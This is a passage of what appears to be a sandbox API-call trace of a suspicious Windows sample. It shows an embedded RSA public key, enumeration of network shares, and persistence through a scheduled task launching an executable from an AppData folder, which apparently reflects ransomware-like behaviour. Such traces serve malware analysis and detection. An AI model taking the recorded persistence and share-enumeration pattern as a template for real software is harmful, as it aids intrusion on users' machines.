(lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.960] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f2f8 [0125.960] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x854) returned 0x62c2e20 [0125.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3f2f8, cbMultiByte=-1, lpWideCharStr=0x62c2e20, cchWideChar=1066 | out: lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 43 [0125.961] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x62c5338 [0125.961] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2e20 | out: hHeap=0x31d0000) returned 1 [0125.961] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f2f8 | out: hHeap=0x31d0000) returned 1 [0125.961] lstrcpyW (in: lpString1=0x521cf0, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.961] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5338 | out: hHeap=0x31d0000) returned 1 [0125.961] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.961] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x56) returned 0x5dc7588 [0125.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a778, cbMultiByte=-1, lpWideCharStr=0x5dc7588, cchWideChar=43 | out: lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 43 [0125.961] lstrcpyW (in: lpString1=0x521cf0, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.961] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0125.961] lstrlenW (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 40 [0125.961] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4090 | out: hHeap=0x31d0000) returned 1 Thread: id = 111 os_tid = 0xb0 [0126.571] timeGetTime () returned 0x115342a [0126.571] GetLastError () returned 0x54f [0126.571] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3bc) returned 0x62c7c30 [0126.571] GetCurrentThreadId () returned 0xb0 [0126.572] SetLastError (dwErrCode=0x54f) [0126.572] Sleep (dwMilliseconds=0x182b8) Thread: id = 112 os_tid = 0x5e4 [0126.572] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xca5fee0 | out: lphEnum=0xca5fee0*=0x5e3e608) returned 0x0 [0127.440] WNetEnumResourceW (in: hEnum=0x5e3e608, lpcCount=0xca5fedc, lpBuffer=0x6353be8, lpBufferSize=0xca5fed8 | out: lpcCount=0xca5fedc, lpBuffer=0x6353be8, lpBufferSize=0xca5fed8) returned 0x0 [0127.440] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x3215690 [0127.440] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x32358d8 [0127.440] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x70) returned 0x6357c08 [0127.440] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358c08 [0127.440] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358c50 [0127.441] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x6353be8, lphEnum=0xca5fe28 | out: lphEnum=0xca5fe28*=0x31f61e0) returned 0x0 [0128.418] WNetEnumResourceW (in: hEnum=0x31f61e0, lpcCount=0xca5fe24, lpBuffer=0x637f498, lpBufferSize=0xca5fe20 | out: lpcCount=0xca5fe24, lpBuffer=0x637f498, lpBufferSize=0xca5fe20) returned 0x103 [0128.418] WNetCloseEnum (hEnum=0x31f61e0) returned 0x0 [0128.418] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32358d8 | out: hHeap=0x31d0000) returned 1 [0128.418] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x3215690 | out: hHeap=0x31d0000) returned 1 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x3215690 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x3215210 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xe0) returned 0x5e35388 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358f68 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x63591f0 [0128.418] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358c50 | out: hHeap=0x31d0000) returned 1 [0128.418] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358c08 | out: hHeap=0x31d0000) returned 1 [0128.418] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6357c08 | out: hHeap=0x31d0000) returned 1 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358c08 [0128.418] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358c50 [0128.418] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x6353c08, lphEnum=0xca5fe28) Thread: id = 113 os_tid = 0x124 Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x2988c000" os_pid = "0x3a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4E354539-1D02-483C-95A2-57EA9CE6ADA5} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0xbac Thread: id = 102 os_tid = 0xbb0 Thread: id = 103 os_tid = 0xb38 Thread: id = 104 os_tid = 0xb2c Thread: id = 105 os_tid = 0xad0 Thread: id = 106 os_tid = 0xb64 Thread: id = 107 os_tid = 0xb70 Process: id = "8" image_name = "2367.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" page_root = "0x51a85000" os_pid = "0x774" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x3a4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0x5f4 [0121.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x54109450, dwHighDateTime=0x1d6bf06)) [0121.897] GetCurrentProcessId () returned 0x774 [0121.897] GetCurrentThreadId () returned 0x5f4 [0121.897] GetTickCount () returned 0x11522cd [0121.897] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24216151237) returned 1 [0121.897] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0121.897] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4a50000 [0121.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0121.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0121.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0121.899] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0121.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.900] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.900] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.901] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.902] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0121.902] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x214) returned 0x4a507d0 [0121.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.902] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0121.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0121.902] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0121.902] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0121.903] GetCurrentThreadId () returned 0x5f4 [0121.903] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0121.903] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x800) returned 0x4a509f0 [0121.903] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0121.903] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0121.903] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0121.903] SetHandleCount (uNumber=0x20) returned 0x20 [0121.903] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --Task" [0121.903] GetEnvironmentStringsW () returned 0x3201d68* [0121.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0121.903] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x0, Size=0x565) returned 0x4a511f8 [0121.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x4a511f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0121.903] FreeEnvironmentStringsW (penv=0x3201d68) returned 1 [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetACP () returned 0x4e4 [0121.904] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x0, Size=0x220) returned 0x4a51768 [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] IsValidCodePage (CodePage=0x4e4) returned 1 [0121.904] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0121.904] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0121.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.904] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0121.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā") returned 256 [0121.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0121.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.905] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ³Ñ®÷\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, 